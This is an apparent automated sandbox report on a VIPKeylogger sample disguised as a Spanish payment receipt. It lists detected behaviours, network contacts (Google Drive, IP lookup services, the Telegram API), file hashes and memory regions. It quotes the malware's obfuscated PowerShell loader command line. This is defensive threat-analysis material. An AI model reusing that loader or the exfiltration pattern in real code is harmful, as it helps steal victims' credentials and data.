Analysis Overview
SHA256
ebac7c8cd5045f76ed8f27f50eaa9c1734560bf4d9b398d81ab0ccd1c5af9e49
Threat Level: Known bad
The file JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Blocklisted process makes network request
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-29 08:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-29 08:37
Reported
2024-11-29 08:40
Platform
win7-20241010-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe
"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"
Network
Files
memory/2788-7-0x0000000073AC1000-0x0000000073AC2000-memory.dmp
memory/2788-8-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/2788-11-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/2788-10-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/2788-9-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/2788-12-0x0000000073AC0000-0x000000007406B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-29 08:37
Reported
2024-11-29 08:40
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
149s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe
"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.180.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3800-5-0x00000000743EE000-0x00000000743EF000-memory.dmp
memory/3800-6-0x0000000003390000-0x00000000033C6000-memory.dmp
memory/3800-7-0x0000000005BE0000-0x0000000006208000-memory.dmp
memory/3800-8-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-9-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-10-0x00000000059B0000-0x00000000059D2000-memory.dmp
memory/3800-11-0x00000000062B0000-0x0000000006316000-memory.dmp
memory/3800-12-0x0000000006320000-0x0000000006386000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lla3erk5.zad.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3800-22-0x0000000006390000-0x00000000066E4000-memory.dmp
memory/3800-23-0x0000000006900000-0x000000000691E000-memory.dmp
memory/3800-24-0x00000000069E0000-0x0000000006A2C000-memory.dmp
memory/3800-25-0x0000000007940000-0x00000000079D6000-memory.dmp
memory/3800-26-0x0000000006EA0000-0x0000000006EBA000-memory.dmp
memory/3800-27-0x0000000006EF0000-0x0000000006F12000-memory.dmp
memory/3800-28-0x0000000007F90000-0x0000000008534000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl
| MD5 | daed86cf08d9bb9cd6ecb4738054b4bf |
| SHA1 | dccb735db3c40e005b405719a7e7fbffbabd4266 |
| SHA256 | b2b48b891fda2d469556c1b554de00c8d6259e04749961ed80376d1f1b2976f0 |
| SHA512 | f881ca1571ba0e4a770318865d176c1cb3ec1b842df11c12935617406c27abc308c24928ec3c0c1f3fb32c8947fd796e9c118ee04b3b279da36e3ecffd711c1c |
memory/3800-30-0x0000000008BC0000-0x000000000923A000-memory.dmp
memory/3800-32-0x0000000070870000-0x00000000708BC000-memory.dmp
memory/3800-42-0x0000000007DC0000-0x0000000007DDE000-memory.dmp
memory/3800-43-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-31-0x0000000007D80000-0x0000000007DB2000-memory.dmp
memory/3800-44-0x0000000007DF0000-0x0000000007E93000-memory.dmp
memory/3800-45-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-47-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-46-0x0000000007EF0000-0x0000000007EFA000-memory.dmp
memory/3800-48-0x0000000007F30000-0x0000000007F41000-memory.dmp
memory/3800-49-0x0000000007F80000-0x0000000007F8E000-memory.dmp
memory/3800-50-0x0000000008680000-0x0000000008694000-memory.dmp
memory/3800-51-0x00000000086C0000-0x00000000086DA000-memory.dmp
memory/3800-52-0x00000000086B0000-0x00000000086B8000-memory.dmp
memory/3800-53-0x00000000086D0000-0x00000000086FA000-memory.dmp
memory/3800-54-0x0000000008700000-0x0000000008724000-memory.dmp
memory/3800-55-0x00000000743EE000-0x00000000743EF000-memory.dmp
memory/3800-56-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-57-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-58-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-59-0x00000000743E0000-0x0000000074B90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Canchas.Mou
| MD5 | 5d3d1c39210847fc1d4ae76b2272a8f4 |
| SHA1 | 88b4f7bba955a4eabaffea4689806b8d409be5ee |
| SHA256 | 04588cf44f89229f0b94e58b3203909c53cfe076062c3bd1844268924c12d289 |
| SHA512 | 497df70f2bdb5c64ac5ab5d06486e1241cf58a76c9c4d501682e5c659d73ddd9bac15c8be45cc5e39021cdcf98592efa1c2aa02e4d1ccc42ae5911d29aecc085 |
memory/3800-61-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-62-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-63-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-65-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-64-0x0000000009240000-0x000000000C369000-memory.dmp
memory/3800-66-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-67-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-69-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/3800-70-0x00000000743E0000-0x0000000074B90000-memory.dmp
memory/2160-83-0x0000000001100000-0x0000000002354000-memory.dmp
memory/2160-84-0x0000000001100000-0x0000000001148000-memory.dmp
memory/2160-85-0x00000000233F0000-0x000000002348C000-memory.dmp
memory/2160-87-0x0000000024030000-0x00000000241F2000-memory.dmp
memory/2160-88-0x0000000023EB0000-0x0000000023F00000-memory.dmp
memory/2160-90-0x0000000024200000-0x0000000024292000-memory.dmp
memory/2160-91-0x0000000023F50000-0x0000000023F5A000-memory.dmp